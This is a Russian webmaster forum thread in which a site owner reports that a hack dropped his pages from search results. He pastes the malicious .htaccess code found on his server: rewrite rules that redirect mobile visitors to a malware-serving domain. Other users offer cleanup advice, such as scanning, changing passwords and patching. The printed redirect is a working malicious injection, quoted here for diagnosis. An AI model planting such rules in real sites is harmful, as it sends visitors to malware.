Быстрый вылет страниц из индекса (Взлом)
Страницы: 1
Быстрый вылет страниц из индекса (Взлом), Взлом и переадресация
Доброго времени суток, уважаемые форумчане.Суть проблемы: Качественный сайт, СДЛ. 
Сайт был взломан, точно сказать примерную дату не могу, случайно заметил, что из индекса резко вылетели около 500 страниц, и остались 9 страниц.
(Не могу понять это агс или нет, как многие уже знают сегодня наблюдается Апдейт ТИЦ, так вот, тиц держался 7 мес., после сег. апдейта тиц сайта - 0)
Тех. поддержка хостинга помогла найти корень проблемы - в аштиакес была прописана переадресация.
При повторном добавлении сайта в ЯМ, выбивало след. ошибку:
Цитата
Добавляемый сайт является неглавным зеркалом сайта [url], который уже добавлен в список ваших сайтов.
Сайт приносит стабильный доход, пожалуйста помогите разобраться с данной проблемой. (Заинтересованным скину сайт в ЛС).За ранее спасибо!
Заработок на продаже качественных ссылок 16.540 р. ежемесячно Сайт: ТИЦ 10»ТУТ« + СКРИНШОТЫ! Не SAPE!
Код, который содержался в файле htaccess:
Цитата
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://ru-phone.com/ [L,R=302]
Цитата
SashOK2993 пишет:
http://ru-phone.com/ (http://\"http://ru-phone.com/\")
Адрес вашего сайта?
При заходе на сайт http://ru-phone.com(если это ваш сайт) через браузер Chrome выдает,

"Внимание! Обнаружена проблема!
Сайт ru-phone.com содержит вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта."
Цитата
MrLexKo пишет:
При заходе на сайт http://ru-phone.com(если это ваш сайт) через браузер Chrome выдает,

"Внимание! Обнаружена проблема!
Сайт ru-phone.com содержит вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта."
у меня тоже(
Зарабатываю 620+ рублей в день на онлайн кинотеатре с 4000 униками в сутки тут.
При заходе на сайт ru-phone.com переносит на operamobi-in.mobi/?stream=2091&type=auto и предлагает скачать оперу :confused:даже если я наживаю отмена
У меня была почти такая же проблема. В файле .htaccess был размещен почти такой же код и Касперский тоже поместил сайт в черный список. Т.е он считал сайт как фишинговым. Что сделал я, я заменил на оригинальный(проверенный) htaccess. И написал в  Лабораторию Касперского. А лучше советую воспользоваться вот этим:
AI-Bolit - этот скрипт может :

искать вирусы, вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам, шеллы на основе несложной эвристикиискать редиректы в .htaccess на вредоносные сайты

искать код sape/trustlink/linkfeed в .php файлах

определять дорвеи

показывать директории, открытые на запись

искать пустые ссылки (невидимые ссылки) в шаблонах

отсылать отчет по email или сохранять в файл

Если интересует могу скинуть ссылку где скачать или найдите сами в Интернете, этот скрипт есть в свободном доступе.

Удачи =)
Да и не забудьте сменить пароли везде =)
bliking, это не мой сайт, это сайт на который стоит редирект
И еще, забыл добавить, обнаружились новые факты.Этот код раскопировался на все сайты, находящиеся на одном хостинге, при замене файла аштиакес на нормальный, происходит восстановление стаорго, вредоносного кода, не знаю что с этим можно делать.....
Цитата
SashOK2993 пишет:
И еще, забыл добавить, обнаружились новые факты.Этот код раскопировался на все сайты, находящиеся на одном хостинге, при замене файла аштиакес на нормальный, происходит восстановление стаорго, вредоносного кода, не знаю что с этим можно делать.....

Как вы узнали что на все сайты? информация от хостера? тогда хостинг должен найти сначала у себя от куда они размножаются а уже потом заменять  htaccess   на сайтах.

Цитата
Spetc пишет:
У меня была почти такая же проблема. В файле .htaccess был размещен почти такой же код и Касперский тоже поместил сайт в черный список.

Через сколько времени вам ответили, и когда каспер перестал ругаться (можно мне в ЛС)? У меня сейчас такая же проблема. Они тоже сказали заменить  htaccess  я заменил 3 назад и отписал им но в ответ полное молчание, на сайт ругается . Но меня напрямую не взламывали, ставил модуль от партнёрки а потом оказалось что она сливает (ворует) моих мобильных посетителей. Убрал но было уже поздно сайт попал в базу каспера.
SashOK2993, Если копируется узнайте у службы поддержки об этом, как вам предложил vito, если служба не поможет, то я рекомендую вам скачать нормальный проверенный движок,  Лично я проверяю их  скриптом AI-Bolit Хорошая вещь.
Цитата
Spetc пишет:
SashOK2993 [ www.cy-pr.com/forum/f15/t37305/#80507 ], Если копируется узнайте у службы поддержки об этом, как вам предложил vito [ www.cy-pr.com/forum/f15/t37305/#17732 ], если служба не поможет, то я рекомендую вам скачать нормальный проверенный движок, Лично я проверяю их скриптом AI-Bolit Хорошая вещь.
действительно хороша вещь, спасибо smile:)
Spetc,

кроме смены паролей посмотрите в инете возможные уязвимости своего движка и добавьте заплатку
oneuser, не за что
Страницы: 1